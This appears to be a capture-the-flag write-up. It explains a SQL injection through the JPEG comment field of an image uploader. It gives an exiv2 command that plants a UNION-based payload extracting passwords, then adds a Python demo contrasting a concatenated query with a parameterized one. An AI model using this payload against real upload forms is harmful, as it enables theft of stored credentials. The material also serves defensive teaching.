The site gives us an image uploader where you can add your photos (only JPG images are accepted) to a gallery (one per team). The vulnerability was very easy to exploit: when you upload an image, the script takes its comment (if none exists, it dies with an error) and inserts it into a SQLite database.

So just download exiv2 and run:

$ exiv2 -c "' union select password from pictures-- -" index4

Then upload it and get the flag.
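
To show why the comment field is the problem and how binding it as a parameter closes the hole, here is an added example (not the challenge's code): it reads the JPEG COM segment and runs it through a concatenated query and a parameterized one. The writeup does not show the site's real query, so the SELECT shape, the table columns other than `password`, and the sample data are assumptions.

```python
import sqlite3
import struct

def sample_jpeg(comment):
    # Constructed minimal file: SOI, one COM (0xFFFE) segment, EOI.
    body = comment.encode("latin-1")
    return b"\xff\xd8\xff\xfe" + struct.pack(">H", len(body) + 2) + body + b"\xff\xd9"

def jpeg_comment(data):
    """Return the first JPEG comment segment as text, or None if absent."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if marker == 0xFE:  # COM segment: attacker-controlled text
            return data[pos + 4:pos + 2 + length].decode("latin-1")
        if marker == 0xDA:  # start of scan, header segments are over
            break
        pos += 2 + length
    return None

def make_db():
    # Assumed schema; only the table name and `password` come from the writeup.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pictures (id INTEGER PRIMARY KEY, comment TEXT, password TEXT)")
    db.execute("INSERT INTO pictures (comment, password) VALUES ('holiday', 'CONSTRUCTED-SECRET')")
    return db

def lookup_unsafe(db, comment):
    # Vulnerable: the comment becomes part of the SQL text.
    sql = "SELECT comment FROM pictures WHERE comment = '" + comment + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_safe(db, comment):
    # Hardened: the comment is bound as a value and never parsed as SQL.
    sql = "SELECT comment FROM pictures WHERE comment = ?"
    return [row[0] for row in db.execute(sql, (comment,))]

if __name__ == "__main__":
    db = make_db()
    comment = jpeg_comment(sample_jpeg("' union select password from pictures-- -"))
    print("unsafe:", lookup_unsafe(db, comment))
    print("safe:  ", lookup_safe(db, comment))
```

File metadata such as the JPEG comment is user input like any form field, so it needs the same bound-parameter handling.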